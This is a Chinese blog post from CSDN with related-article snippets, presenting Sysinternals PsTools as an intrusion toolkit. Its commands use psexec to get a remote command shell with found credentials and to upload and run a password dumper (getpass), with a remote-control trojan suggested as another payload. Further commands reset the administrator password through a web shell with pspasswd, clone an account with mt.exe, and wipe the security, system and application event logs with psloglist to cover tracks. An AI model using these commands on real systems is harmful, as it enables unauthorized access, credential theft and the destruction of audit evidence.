pstools套件在渗透中的应用详解

最新推荐文章于 2023-10-26 13:47:35 发布
最新推荐文章于 2023-10-26 13:47:35 发布
阅读量1.4w 收藏 14
点赞数 2
分类专栏: 渗透相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SysProgram/article/details/13001781
版权

其实接触pstool很久了,但是据我观察用pstools套件在渗透中的应用的介绍却比较少。

当然玩bt5的同学可能常常用到,小菜就写一篇关于pstools套件在渗透中的应用进行详解。

pstool的介绍

PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。

还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。

如何建立IP$连接。命令如下:

Net user \\目标ip\ 密码 /user:用户

Net user \\192.168.1.3\ 123456 /user:test

建立后所有的ps工具都将可以不用输入用户和密码了。

其中12款工具简介如下:

◆PsExec - 远程执行进程

◆PsFile - 显示远程打开的文件

◆PsGetSid - 显示计算机或用户的 SID

◆PsInfo - 列出有关系统的信息

◆PsKill - 按名称或进程 ID 终止进程

◆PsList - 列出有关进程的详细信息

◆PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户

◆PsLogList - 转储事件日志记录

◆PsPasswd - 更改帐户密码

◆PsService - 查看和控制服务

◆PsShutdown - 关闭并重新启动(可选)计算机

◆PsSuspend - 暂停进程

这里讲对其中的几个工具进行详解,其他的将只介绍用法。

下载地址:http://download.sysinternals.com/files/PSTools.zip

psexec的应用详解

Pstools中最强大最常利用的工具就属psexec这款工具。这款工具的本意是替代telnet这种不安全的管理方式。它最大的特点就属无需安装客服端程序就可以远程操作服务器。

简单来说,就是一旦你知道服务器或者电脑的用户名和密码,你就可以利用它远程执行系统命令。这样一款工具放到渗透当中真是太淫荡了。它适用于windows NT/2x/xp/vista

下面介绍详细参数:

-u 远程计算机的用户名

-p 远程计算机用户对应密码

-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)

-d 不等待程序执行完就返回 (意思就是,当你执行一个程序无需等到他结束才返回信息)

-h用于目标系统是Vista或更高版本

其他参数就不做介绍,这里主要是讲用法。

远程获取一个cmdshell

比如我再渗透中扫描到目标机(192.168.1.3)的一个用户名(test)和密码(123456)。

那我们的命令就是:

psexec \\目标ip -u 用户名 -p 密码 进程名

psexec \\192.168.1.3 –u test –p 123456 cmd.exe

看下图,这是成功连接到一台远程服务器,并获得一个cmdshell,shell权限即位当前用户权限。

这里还将提到的是由于windows策略,将不允许空密码登陆。

可能有些机油对用户权限登陆还有疑虑,什么用户才可以登陆。

我这建立了一个属于guest的一个用户我们来看看它是否能连接。

经过测试,比guest权限大的用户组都可以远程登陆。

IIS_WPG用户组的无法远程连接,但是你不用担心,一般属于IIS_WPG用户组的用户一般也属于guest用户组。

有关用户组相关的介绍请围观法客周年庆之提权专题

下载地址: http://www.2cto.com/ebook/201211/35554.html

获取cmdshell的介绍就到这里。一旦获得一个cmdshell后面的渗透将会比较轻松。

经过测试,用最新版的pstools,windows2008 win7 都能连接成功,win8由于没有win8系统,就未测试,应该是能行的,毕竟这是微软的管理工具。

Win7连接示意图:

程序上传并执行

首先现在在本地配置一个将上传到服务器上运行的程序到H盘根目录。这里用抓取系统密码的神器getpass来演示。H:\getpass.exe

程序上传并执行命令如下:

Psexec \\192.169.1.3 –u test –p 12345 –c H:\getpass.exe –d

最后一个-d的参数可有可无~~~

只是怕程序远程运行后会卡住而无法返回信息。

测试如图:

当然你也可运行一个远控木马这些都可以~~~

Psexec 的介绍就到这里了。

pspasswd的应用详解

Pspasswd是一个用来更改用户密码的工具,支持远程密码修改和本地密码修改。这款工具的特点就是不依靠net,exe程序进行密码修改。

本地修改命令如下:

pspasswd administrator yueyan

演示图如下:

远程命令如下:

pspasswd \\192.168.1.3 –u administrator –p 123456 guest yueyan

命令的意思就是,用administrator这个管理员账户登录后修改用户guest的密码为yueyan

相对来说本地修改密码的功能更强大一些。

我这将介绍个实例:

我的一个好基友Lynn得到一个jsp马,并且是nt authority\system权限。但是无法添加用户,且无法用net修改管理员密码。抓取hash密码大于14位,LMhash无效,本地又为搭建彩虹表,网上破解无果。Hash传递登陆被拦截。但是机油lynn却一直想用administrator这个用户登陆进去,当然方法还有很多,比如: mimikatz.exe抓取明文密码等,这里我将介绍pspasswd的妙用。

我们想用administrator这个账户登陆进去。很简单,直接上传一个pspasswd上服务器。

执行下面的命令:

首先执行D:\web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思)

D:\web|pspasswd.exe administrator yueyan

就会成功修改administrator的密码。

这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。

上述介绍常常配合mt.exe进行用户克隆。这里简单介绍:

(关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍)

首先mt.exe查看用户sid,比较后看是否有克隆账户

Mt -chkuser

比较后,没有克隆账户,我们选择guest这个账户进行克隆:

Mt –clone administrator guest

然后配合pspasswd修改密码:

Pspasswd guest yueyan

就这样成功克隆一个账户,并能成功登陆访问。

Pspasswd的功能就介绍到这里。

pskill+psinfo+pslist的应用详解

首先是介绍pskill.

如果你想远程结束远程主机上的一个进程,你可以使用pskill。

我们就介绍一下常用的命令:

比如我们想远程关闭远程主机正在运行的cmd这个进程,可以用pskill进行杀掉。命令如下:

pskill \\192.168.1.3 –u test –p 123456 cmd.exe

命令很简单~~~~

我再介绍psinfo的相关应用。

基本参数是:

-h 显示已经安装的补丁信息

-s 显示已安装的软件信息

-d 显示磁盘信息

如果我们想看远程主机的基本信息,命令如下:

psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456

接下来就是pslist。

主要特点是,显示本地或者远程计算机的进程运行情况。

主要参数:

-m 显示内存信息

-x 显示进程,内存和线程

-t 显示进程树

-s n 在任务管理器模式先运行,n指定秒,以esc结束。

-r n 任务管理器模式刷新速率,n指秒

例如我们想看远程计算机的进程运行情况,命令如下:

Pslist –x \\192.168.1.3 –u test –p 123456

效果图如下:

其他ps工具介绍:

PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。

命令如下:

Psloggedon –l \\192.168.1.3

PSLOGLIST:事件日志转储及管理。

这个对于渗透测试是非常有用的,它最大的特点就是远程清理系统日志。

常用:

psloglist \\72.56.17.74 application -c > nul

psloglist \\72.56.17.74 system -c > nul

psloglist \\72.56.17.74 security -c > nul

分别是清理应用程序日志,系统运行日志,安全日志。

PSSERVICE:管理服务。

常用:

psservice query messenger

查询messenger服务的相关信息。

最重要的项目是:服务名称、显示名称、服务描述、服务类型、服务状态。

psservice config messenger

查询服务的配置信息。

最重要的项目是:服务名称、服务描述、服务类型、服务启动类型、服务错误控制级别、可执行文件的路径等等。

PSSHUTDOWN:关机工具。

常用命令:

Psshutdown –s –t 60

60秒后关机。

下面几个不常用,就介绍下:

PsFile - 显示远程打开的文件

Psfile \\192.168.1.3

PsGetSid - 显示计算机或用户的 SID

Psgetsid \\192.168.1.3

PsSuspend - 暂停进程

Pssuspend \\192.168.1.3 –u test –p 123456 cmd,exe


sysprogram
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PsTools 2.45(内附12个工具的详细使用方法)
09-02
readme.txt 用实例详细介绍12个工具的使用方法。 PsTools是一个功能强大的远程管理工具包。工具包可谓是小工具里经典的经典了,否则MS怎么会收购它呢,现在Telnet大部分关了,AT在win7还有,win10已取消,但PsTools可以使用的。 假设我要对192.168.0.8计算机进行远程管理,那么我可以先打开一个命令行窗口。在命令行输入以下命令后敲回车:   D:\tools\Pstools>psexec file://192.168.0.8/ -u administrator -p 123 cmd.exe   PsExec v1.31 - execute processes remotely   Copyright (C) 2001-2002 Mark Russinovich   Microsoft Windows 2000 [Version 5.00.2195]   (C) 版权所有 1985-1998 Microsoft Corp.   C:\WINNT\system32>   解释一下,上述参数的“-u administrator”是表示使用administrator身份来登录192.168.0.8计算机;“-p 123”是表示administrator的密码为123;“cmd.exe”表示我想执行远程计算机上面的cmd.exe命令,如果远程计算机上面没有 这个命令,你可以增加“-c”的参数,这样就可以把本地计算机上的这个命令直接拷贝到远程计算机后再执行。“C:\WINNT \system32>”表示你已经登录到远程计算机上面了。怎么样,这比telnet要方便得多吧,如果对方没有开telent、或者如果对方开了 但仍然使用着NTLM验证,想想看你得花多大的精力才能登录到对方的计算机上面呢?   第二个工具是Psinfo。正如它的名字所示,该命令可以查看本地或者远程计算机的一些系统信息、软件安装信息和其他信息,不加任何参数的Psinfo就只显示本地计算机的系统信息。用法如下:   psinfo [-h] [-s] [-d] [-c] [\\RemoteComputer [-u Username [-p Password]]]   我们用实例来介绍该命令的使用,在命令行下输入:   D:\tools\Pstools>psinfo file://192.168.0.8/ -s -u administrator -p 123   其“-s”表示显示远程计算机上面已安装的软件信息,“-u”和“-p”含义同PsExec。这条命令显示192.168.0.8计算机上面的系统信息 和软件信息。系统信息包括系统安装时间、内存大小、CPU频率和品牌、操作系统类型等等。………… [未公开参数:自动接受“最终用户许可协议”的参数 -accesseula]
pstool 工具
03-20
强大的windows 辅助管理工具,比如修改注册表权限,等等很多强大的应用
pstools使用教程
dlzx9634的博客
07-25 607
pstools是sysinternals开发的一个功能强大的nt/2k远程管理工具包。 官方网址为http://www.sysinternals.com/ 下载地址为http://www.sysinternals.com/files/Pstools.zip Pstools主要包含以下程序: (1)psexec psexec是一个远程执行工具...
关于怎么使用PsTools工具清除电脑u盘使用记录
最新发布
qq_42007143的博客
10-26 1503
(1)HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Enum/USB(2)HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Enum/USB(3)HKEY_LOCAL_MACHINE/SYSTEM/ControlSet003/Enum/USB(4)HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Enum/USB2)、删除DeviceClasses下的a5d...、53f...等含usb字眼的部分子项。
【转】PSTools工具使用方法
sinolover的专栏
03-11 3641
转自:https://blog.csdn.net/hongkaihua1987/article/details/85230082https://blog.51cto.com/winhe/1742633 本篇文章是基于pstools 2.7版本。pstools是sysinternals出的一个功能强大的nt/2k远程管理工具包。 它的主页为http://www.sysinternals.com/ 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/do..
pstools套件在渗透应用详解1
08-03
PSTools套件在渗透应用详解PSTools是由Sysinternals开发的一系列实用程序,现已被微软收购,成为Windows系统管理工具的重要组成部分。这个套件包含了12个功能各异的小工具,它们在网络安全渗透测试具有...
PSTools安全管理工具套件
01-06
如果将它们灵活的运用,将会在渗透收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。 还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。 如何...
PSTools及使用说明
11-11
除了PsExec,PSTools套件的其他工具也各有特色。例如,PsKill可以用来远程结束进程,而PsGetSession则能列出远程计算机上的会话信息。了解并熟练掌握这些工具的用法,对于系统管理员来说是提高工作效率和解决问题...
PSTools:在 Prestashop 导入产品的 CSV-开源
07-06
在电子商务环境,高效地管理大量产品信息是非常重要的,因此PSTools的存在解决了这一需求。 PSTools的核心功能在于其CSV处理能力。CSV(Comma Separated Values)是一种通用的数据交换格式,尤其适用于表格数据,...
PSTools.zip
07-15
1. PsExec:这是PSTools最知名的工具之一,它可以远程执行命令或应用程序,无需安装任何客户端软件。通过PsExec,你可以像在本地计算机上一样,在远程系统上启动进程,甚至可以在远程会话运行交互式程序。支持...
PsTools Suite.rar
09-09
工具 说明 PsExec 用于在任何用户环境执行进程。 PsFile 显示系统上远程打开的文件。 PsGetSid 显示计算机或用户的 Windows 安全标识符 (SID)。 PsInfo 列出有关 Windows 系统的信息。 PsKill 按照名称或进程 ID 终止进程。 PsList 列出有关运行进程的详细信息。 PsLoggedOn 显示所有本地登录的用户以及所有远程资源共享用户。 PsLogList 转储 Windows 事件日志记录。 PsPasswd 更改用户帐户的密码。 PsService 查看和控制 Windows 服务。 PsShutdown 关闭、重新启动、休眠或挂起计算机。 PsSuspend 挂起运行的进程。
PSTools工具集.zip
03-19
PSTools是帮助解决Windows系统和Mac系统蓝牙共享问题的关键工具,它的作用是帮助读取Windows下注册表蓝牙适配器地址。
PSTools工具
06-29
pstools是微软系统的辅助工具,不提供技术支持,最初是由sysinternals开发的,之后被微软收购。这个工具集有很多好的东东,用于远程连接到服务器和客户端使用。
PS图片删除需要计算机管理权限,如何使用PsTools工具执行本地/远程PC管理任务
weixin_35591736的博客
07-13 538
大多数刚入门的管理员都习惯使用 RDP 或其它类似的工具连接到远程 Windows 进行图形化管理。而 PowerShell 及 PsTools 等工具可以帮助我们在命令行执行相当多的管理任务,更主要的是可以将其写成脚本来执行周期性重复任务或在管理大批量服务器时提高效率。在企业环境掌握更多的命令行工具不仅可以节省时间,以更聪明和智能的方式完成工作,更是一个系统管理员所必需掌握的关键技能。作为...
工具:PsTools-windows问题定位系列小工具
xiaobaiPlayGame的专栏
03-16 2995
PsTools是Sysinternals Suite一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools含各式各样的小工具。如果将它们灵活的运用,将会在渗透收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。
一些Pstool
从菜鸟到菜菜鸟
09-08 3250
PsExec - execute processes remotely PsFile - shows files opened remotely PsGetSid - display the SID of a computer or a user PsInfo
[转载]: 用PsTools工具执行本地/远程Windows管理任务
Tody Guo的专栏
04-11 1567
本文转载如下连接:SysInternals系列:使用PsTools工具执行本地/远程PC管理任务如果你希望使用命令行连接到远程计算机上执行各种管理工作,如查看远程计算机进程信息、关闭进程、甚至是管理远程 PC 的 Windows 服务,PsTools 命令行工具包将是我们推荐的不二选择。我们将介绍如何使用 PsTools 命令行工具执行本地/远程 PC 管理任务。https://www.sysgeek.cn/sysinternals-pstools/ 如果你希望使用命令行连接到远程计算机上执行各..
pstools.zip
09-29
pstools.zip是一个包含PSTools工具集合的压缩文件。PSTools是由微软公司开发的一组命令行实用工具,它们旨在帮助系统管理员更轻松地管理和监控Windows操作系统。pstools.zip文件包含了几个常用的PSTools工具,例如PsExec、PsFile、PsInfo、PsList、PsKill等。 PsExec是PSTools工具集最常用的工具之一。它允许管理员在本地或远程系统上执行命令行程序或批处理文件。通过远程执行命令的功能,管理员可以方便地在多台计算机上进行批量操作,例如安装更新、启动或停止服务等。 PsFile是用于显示系统上已打开文件信息的工具。管理员可以使用PsFile来查看哪些文件被进程打开,以及这些文件的路径、ID和访问权限等。 PsInfo是一个用于查看系统信息的命令行工具。管理员可以通过PsInfo获得有关计算机硬件、操作系统版本、已安装软件以及系统配置等详细信息,这对于故障排除和系统管理非常有用。 PsList是一个类似于任务管理器的工具,它显示当前系统上运行的进程列表。管理员可以使用PsList来监控系统资源的使用情况,包括CPU、内存和网络等。 PsKill是一个强制终止进程的工具。管理员可以使用PsKill来终止应用程序或进程,无论它们是本地运行还是在远程系统上运行。 通过使用pstools.zip的这些工具,系统管理员可以更高效地管理和监控Windows操作系统,提高工作效率,解决系统问题,并确保系统的正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值